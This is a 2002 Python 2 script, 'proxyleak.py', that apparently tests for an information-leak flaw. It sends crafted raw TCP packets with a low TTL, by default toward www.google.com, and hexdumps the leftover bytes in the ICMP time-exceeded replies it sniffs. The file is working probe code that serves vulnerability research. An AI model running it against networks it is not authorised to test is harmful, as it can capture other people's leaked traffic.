#! /usr/bin/python

#############################################################################
##                                                                         ##
## proxyleak.py --- Simple tester for the proxyleak vulnerability          ##
##                                                                         ##
## Copyright (C) 2002  Philippe Biondi <biondi@cartel-securite.fr>         ##
##                                                                         ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License as published by the   ##
## Free Software Foundation; either version 2, or (at your option) any     ##
## later version.                                                          ##
##                                                                         ##
## This program is distributed in the hope that it will be useful, but     ##
## WITHOUT ANY WARRANTY; without even the implied warranty of              ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU       ##
## General Public License for more details.                                ##
##                                                                         ##
#############################################################################



from socket import *
import getopt,sys
from select import select


def usage():
    print "Usage: proxyleak.py [-f finalhost] [-t targetttl] [-p port]"
    sys.exit(0)

ETH_P_IP=0x800

def sane(x):
    r=""
    for i in x:
        j = ord(i)
        if (j < 32) or (j >= 127):
            r=r+"."
        else:
            r=r+i
    return r

def hexdump(x):
    l = len(x)
    for i in range(l):
        print "%02X" % ord(x[i]),
    print " "+sane(x)


ttl=1
port=80
target="www.google.com"


try:
    opts=getopt.getopt(sys.argv[1:], "hf:t:p:")
    for opt,parm in opts[0]:
        if opt == "-h":
            usage()
        elif opt == "-f":
            target = parm
        elif opt == "-t":
            try:
                ttl = int(parm)
            except TypeError:
                raise getopt.GetoptError("ttl parameter (%s) must be an int" % parm, None)
        elif opt == "-p":
            try:
                port = int(parm)
            except TypeError:
                raise getopt.GetoptError("port parameter (%s) must be an int" % parm, None)
    if len(opts[1]) > 0:
        raise getopt.GetoptError("Too many parameters : [%s]" % " ".join(opts[1]),None)

    try:
        n=inet_aton(target)
    except error:
        try:
            target=gethostbyname(target)
            n=inet_aton(target)
        except error:
            raise getopt.GetoptError("host [%s] not found" % parm, None)

except getopt.error, msg:
    print "ERROR:", msg
    sys.exit(1)
        



        



packet="E\x00\x00(\x00\x00\x00\x00"+chr(ttl)+"\x06\x00\x00\x00\x00\x00\x00"+inet_aton(target)+"\x00P\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02\x00\x01\x93\'\x00\x00"


try:
    s=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)
    s.setsockopt(SOL_IP, IP_HDRINCL, 1)
    t=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP))

    i = 0
    seen={}
    while 1:
        s.sendto(packet, (target,0))
        while 1:
            i,o,e = select([t],[],[],0)
            if not i:
                break
            p = t.recv(1600)
            if ord(p[14+9]) != IPPROTO_ICMP:
                continue
            p=p[34:]
            if p[:2] != "\x0b\x00":
                continue
            p=p[54:]
	    if seen.has_key(p):
		continue
	    seen[p]=None
            hexdump(p)
#            print repr(p)
except KeyboardInterrupt:
    pass